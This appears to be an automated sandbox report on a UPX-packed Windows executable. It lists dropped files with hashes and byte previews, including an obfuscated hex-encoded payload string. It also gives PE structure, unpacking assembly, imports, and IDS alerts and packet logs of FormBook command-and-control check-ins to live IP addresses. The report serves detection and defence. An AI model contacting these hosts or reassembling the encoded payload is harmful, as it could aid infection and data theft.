                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                            Category:dropped
                                            Size (bytes):114688
                                            Entropy (8bit):0.9746603542602881
                                            Encrypted:false
                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\qlG7x91YXH.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14988
                                            Entropy (8bit):7.573772966370223
                                            Encrypted:false
                                            SSDEEP:384:M9/REhXRzReZsxLOxg8l71kklH9+O5Wt2y6oApRk0OK:MRsEOOHzd+6Fpv
                                            MD5:0C009CF6995A0D73E229F99392E26E1A
                                            SHA1:A4A2369E55037C98CADAB1766E84B7981E26408B
                                            SHA-256:6A6A6106D10B416345D1FB47247525C1629B96058BED1AE8F0ECC794C0A04176
                                            SHA-512:B536F22E4A18DAD10D1A3E43936DE3E953CAB43D6EEAC0095CEDD3D77B321ED8D2FC00E15CB334FDC6BAFF37CA2B9D544B85E4F0AA1F61AA12AC33FF06160115
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                                            Process:C:\Users\user\Desktop\qlG7x91YXH.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):289280
                                            Entropy (8bit):7.992657614242951
                                            Encrypted:true
                                            SSDEEP:6144:4iaL+cNLr0W24h2JneX07rhAL5C7eYWGj/Yah5:4NKcN/2xeX0BAl8eYpL
                                            MD5:81933302435FB00AF2798923B03B749C
                                            SHA1:CB34FFEBDC52F4F261D5EFB71AAC076E905CCDB4
                                            SHA-256:63853DD4391E335E94A8FD82ADEB3891132B12AD1EB7194423DF31AAAF6591CE
                                            SHA-512:006DA353B710381257B71E6162DCFC20F659005C13640DA818DFAA4FB51D4B66B137D108115412B1D00DD8066A64D1BF825E918553489573139DC681CC53842E
                                            Malicious:false
                                            Reputation:low
                                            Preview:~..E4KQQ1Q00..ZC.7KQQ5Q0pS3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ.Q00],.ME.B.p.P|.rg2*6.;#>R#Q]sP;-+X?q3PqBE=.3-es..qX>TU}>WIa7KQQ5Q0IR:.~%P.l1R..P4.@...q16.K....:$.-....1W..Z9+xW,.Q5Q00S3Z..7K.P4Q.d.dZCE7KQQ5.02R8[HE7.UQ5Q00S3ZC%"KQQ%Q00#7ZCEwKQA5Q02S3\CE7KQQ5W00S3ZCE7;UQ5S00S3ZCG7..Q5A00C3ZCE'KQA5Q00S3JCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCkC.)%5Q0..7ZCU7KQ.1Q0 S3ZCE7KQQ5Q00S.ZC%7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00
                                            Process:C:\Users\user\Desktop\qlG7x91YXH.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):289280
                                            Entropy (8bit):7.992657614242951
                                            Encrypted:true
                                            SSDEEP:6144:4iaL+cNLr0W24h2JneX07rhAL5C7eYWGj/Yah5:4NKcN/2xeX0BAl8eYpL
                                            MD5:81933302435FB00AF2798923B03B749C
                                            SHA1:CB34FFEBDC52F4F261D5EFB71AAC076E905CCDB4
                                            SHA-256:63853DD4391E335E94A8FD82ADEB3891132B12AD1EB7194423DF31AAAF6591CE
                                            SHA-512:006DA353B710381257B71E6162DCFC20F659005C13640DA818DFAA4FB51D4B66B137D108115412B1D00DD8066A64D1BF825E918553489573139DC681CC53842E
                                            Malicious:false
                                            Preview:~..E4KQQ1Q00..ZC.7KQQ5Q0pS3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ.Q00],.ME.B.p.P|.rg2*6.;#>R#Q]sP;-+X?q3PqBE=.3-es..qX>TU}>WIa7KQQ5Q0IR:.~%P.l1R..P4.@...q16.K....:$.-....1W..Z9+xW,.Q5Q00S3Z..7K.P4Q.d.dZCE7KQQ5.02R8[HE7.UQ5Q00S3ZC%"KQQ%Q00#7ZCEwKQA5Q02S3\CE7KQQ5W00S3ZCE7;UQ5S00S3ZCG7..Q5A00C3ZCE'KQA5Q00S3JCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCkC.)%5Q0..7ZCU7KQ.1Q0 S3ZCE7KQQ5Q00S.ZC%7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00S3ZCE7KQQ5Q00
                                            Process:C:\Users\user\Desktop\qlG7x91YXH.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):172054
                                            Entropy (8bit):3.1806714125567406
                                            Encrypted:false
                                            SSDEEP:48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fb:iaNlrHNILsaDfrQ7O4sCkR1avfklX
                                            MD5:AF62F55AA12474714A69B10BC3F9D6E1
                                            SHA1:D27BBF52910810866FACBF58D2B0B29EF8C19B6C
                                            SHA-256:3D3BA901EB95C09426F85968A6B86914DD8BE33904121B36F752A6E08044DC55
                                            SHA-512:832E6910DF01DBCB56530CC79A98EF8C1A3FEB02D20AAB87BA0C5B73DE6B3F96721A57CCF4A5B169F7E678376418D7D1A2EFC1BD3D196A3244E2A37BE03326B2
                                            Malicious:false
                                            Preview:hixjs0hixjsxhixjs5hixjs5hixjs8hixjsbhixjsehixjschixjs8hixjs1hixjsehixjschixjschixjschixjs0hixjs2hixjs0hixjs0hixjs0hixjs0hixjs5hixjs6hixjs5hixjs7hixjsbhixjs8hixjs6hixjsbhixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjs4hixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjs6hixjsbhixjsahixjs7hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjs8hixjsbhixjs8hixjs6hixjsehixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjsahixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjschixjsbhixjsahixjs6hixjschixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjsehixjsbhixjs8hixjs3hixjs3hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs9hixjs0hixjsbhixjs9hixjs3hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixj
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                            Entropy (8bit):7.838072991030024
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.39%
                                            • UPX compressed Win32 Executable (30571/9) 0.30%
                                            • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            File name:qlG7x91YXH.exe
                                            File size:782'336 bytes
                                            MD5:29e38e8c57aea7a49657e5960d12f3e9
                                            SHA1:f7d3a8409c04c762baab30d5ef54becb38360c74
                                            SHA256:f57ac51331e5239f4cae4e94cbeb985860a6304b5e4822e638e7122915d8a7a2
                                            SHA512:45a3081d46b849f6c57d36c0540c76dabc3e22441249c1bceba01259807a4a562a37ce23b32344a20a25b38146df8879cdb991af2f4af456fab292a8871dbdd0
                                            SSDEEP:12288:HsHzOUNUSB/o5LsI1uwajJ5yvv1l2C23EAmDq+F/NUYpHl1j3EaL8yiiHLwoK40u:2iUmSB/o5d1ubcvXQE/Ws0aLLpFK4yru
                                            TLSH:66F412B2B502ED4CE40757F20C7A863140678E9CD8EE890A21E93F3F7677351645BDAA
                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                            Icon Hash:0fd88dc89ea7861b
                                            Entrypoint:0x547730
                                            Entrypoint Section:UPX1
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6768A2C0 [Sun Dec 22 23:37:36 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:21371b611d91188d602926b15db6bd48
                                            Instruction
                                            pushad
                                            mov esi, 004EB000h
                                            lea edi, dword ptr [esi-000EA000h]
                                            push edi
                                            jmp 00007F37BC83C89Dh
                                            nop
                                            mov al, byte ptr [esi]
                                            inc esi
                                            mov byte ptr [edi], al
                                            inc edi
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F37BC83C87Fh
                                            mov eax, 00000001h
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc eax, eax
                                            add ebx, ebx
                                            jnc 00007F37BC83C89Dh
                                            jne 00007F37BC83C8BAh
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F37BC83C8B1h
                                            dec eax
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc eax, eax
                                            jmp 00007F37BC83C866h
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc ecx, ecx
                                            jmp 00007F37BC83C8E4h
                                            xor ecx, ecx
                                            sub eax, 03h
                                            jc 00007F37BC83C8A3h
                                            shl eax, 08h
                                            mov al, byte ptr [esi]
                                            inc esi
                                            xor eax, FFFFFFFFh
                                            je 00007F37BC83C907h
                                            sar eax, 1
                                            mov ebp, eax
                                            jmp 00007F37BC83C89Dh
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F37BC83C85Eh
                                            inc ecx
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jc 00007F37BC83C850h
                                            add ebx, ebx
                                            jne 00007F37BC83C899h
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            adc ecx, ecx
                                            add ebx, ebx
                                            jnc 00007F37BC83C881h
                                            jne 00007F37BC83C89Bh
                                            mov ebx, dword ptr [esi]
                                            sub esi, FFFFFFFCh
                                            adc ebx, ebx
                                            jnc 00007F37BC83C876h
                                            add ecx, 02h
                                            cmp ebp, FFFFFB00h
                                            adc ecx, 02h
                                            lea edx, dword ptr [edi+ebp]
                                            cmp ebp, FFFFFFFCh
                                            jbe 00007F37BC83C8A0h
                                            mov al, byte ptr [edx]
                                            Programming Language:
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1a9d34 | 0x424 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x148000 | 0x61d34 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1aa158 | 0x14 | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x147914 | 0x18 | UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x147934 | 0xa0 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0xea000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0xeb000 | 0x5d000 | 0x5ca00 | 4c92a5c6a227af29ccb4f2197d035cc4 | False | 0.9886133603238867 | data | 7.9371810374314276 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x148000 | 0x63000 | 0x62200 | e6863ac701d89213cbcd486ef3da24e8 | False | 0.8517764729299363 | data | 7.651448217117502 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x14845c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0x148588 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0x1486b4 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0x1487e0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m | English | Great Britain | 0.14468236129184905
RT_MENU | 0xe4ff8 | 0x50 | empty | English | Great Britain | 0
RT_STRING | 0xe5048 | 0x594 | empty | English | Great Britain | 0
RT_STRING | 0xe55dc | 0x68a | empty | English | Great Britain | 0
RT_STRING | 0xe5c68 | 0x490 | empty | English | Great Britain | 0
RT_STRING | 0xe60f8 | 0x5fc | empty | English | Great Britain | 0
RT_STRING | 0xe66f4 | 0x65c | empty | English | Great Britain | 0
RT_STRING | 0xe6d50 | 0x466 | empty | English | Great Britain | 0
RT_STRING | 0xe71b8 | 0x158 | empty | English | Great Britain | 0
RT_RCDATA | 0x15900c | 0x507f2 | data | | | 1.0003366554043807
RT_GROUP_ICON | 0x1a9804 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1a981c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1a9834 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1a984c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1a9864 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1a9944 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | GetAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetSaveFileNameW
GDI32.dll | LineTo
IPHLPAPI.DLL | IcmpSendEcho
MPR.dll | WNetGetConnectionW
ole32.dll | CoGetObject
OLEAUT32.dll | OleLoadPicture
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | connect
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T17:44:23.870873+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49827 | 156.226.63.13 | 80 | TCP
2025-01-10T17:44:23.870873+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49827 | 156.226.63.13 | 80 | TCP
2025-01-10T17:44:40.836089+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49933 | 103.120.80.111 | 80 | TCP
2025-01-10T17:44:43.538626+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49951 | 103.120.80.111 | 80 | TCP
2025-01-10T17:44:46.206284+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49968 | 103.120.80.111 | 80 | TCP
2025-01-10T17:44:48.763580+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49985 | 103.120.80.111 | 80 | TCP
2025-01-10T17:44:48.763580+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49985 | 103.120.80.111 | 80 | TCP
2025-01-10T17:45:11.259241+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50009 | 104.21.80.1 | 80 | TCP
2025-01-10T17:45:13.879500+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50010 | 104.21.80.1 | 80 | TCP
2025-01-10T17:45:16.476145+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50011 | 104.21.80.1 | 80 | TCP
2025-01-10T17:45:18.946952+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50012 | 104.21.80.1 | 80 | TCP
2025-01-10T17:45:18.946952+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50012 | 104.21.80.1 | 80 | TCP
2025-01-10T17:45:25.172009+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50013 | 208.91.197.27 | 80 | TCP
2025-01-10T17:45:27.699824+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50014 | 208.91.197.27 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 17:44:22.984572887 CET | 49827 | 80 | 192.168.2.4 | 156.226.63.13
Jan 10, 2025 17:44:22.989540100 CET | 80 | 49827 | 156.226.63.13 | 192.168.2.4
Jan 10, 2025 17:44:22.989624023 CET | 49827 | 80 | 192.168.2.4 | 156.226.63.13
Jan 10, 2025 17:44:22.998842955 CET | 49827 | 80 | 192.168.2.4 | 156.226.63.13
Jan 10, 2025 17:44:23.004277945 CET | 80 | 49827 | 156.226.63.13 | 192.168.2.4
Jan 10, 2025 17:44:23.870687962 CET | 80 | 49827 | 156.226.63.13 | 192.168.2.4
Jan 10, 2025 17:44:23.870731115 CET | 80 | 49827 | 156.226.63.13 | 192.168.2.4
Jan 10, 2025 17:44:23.870872974 CET | 49827 | 80 | 192.168.2.4 | 156.226.63.13
Jan 10, 2025 17:44:23.874108076 CET | 49827 | 80 | 192.168.2.4 | 156.226.63.13
Jan 10, 2025 17:44:23.878910065 CET | 80 | 49827 | 156.226.63.13 | 192.168.2.4
Jan 10, 2025 17:44:39.934765100 CET | 49933 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:39.939901114 CET | 80 | 49933 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:39.939984083 CET | 49933 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:40.060647011 CET | 49933 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:40.065563917 CET | 80 | 49933 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:40.835550070 CET | 80 | 49933 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:40.836088896 CET | 49933 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:41.576072931 CET | 49933 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:41.580912113 CET | 80 | 49933 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:42.622591972 CET | 49951 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:42.627491951 CET | 80 | 49951 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:42.627600908 CET | 49951 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:42.770786047 CET | 49951 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:42.775769949 CET | 80 | 49951 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:43.538531065 CET | 80 | 49951 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:43.538625956 CET | 49951 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:44.294842958 CET | 49951 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:44.299798012 CET | 80 | 49951 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:45.313215971 CET | 49968 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:45.318367004 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:45.318474054 CET | 49968 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:45.331123114 CET | 49968 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:45.336098909 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:45.336119890 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:45.336148024 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:45.336162090 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:45.336232901 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:45.336246014 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:45.336271048 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:45.336328030 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:45.336342096 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:46.206197977 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:46.206284046 CET | 49968 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:46.841842890 CET | 49968 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:46.846875906 CET | 80 | 49968 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:47.859920979 CET | 49985 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:47.864937067 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:47.865071058 CET | 49985 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:47.872579098 CET | 49985 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:47.877362013 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:48.763370991 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:48.763396025 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:48.763413906 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:48.763545036 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:48.763580084 CET | 49985 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:48.763628960 CET | 49985 | 80 | 192.168.2.4 | 103.120.80.111
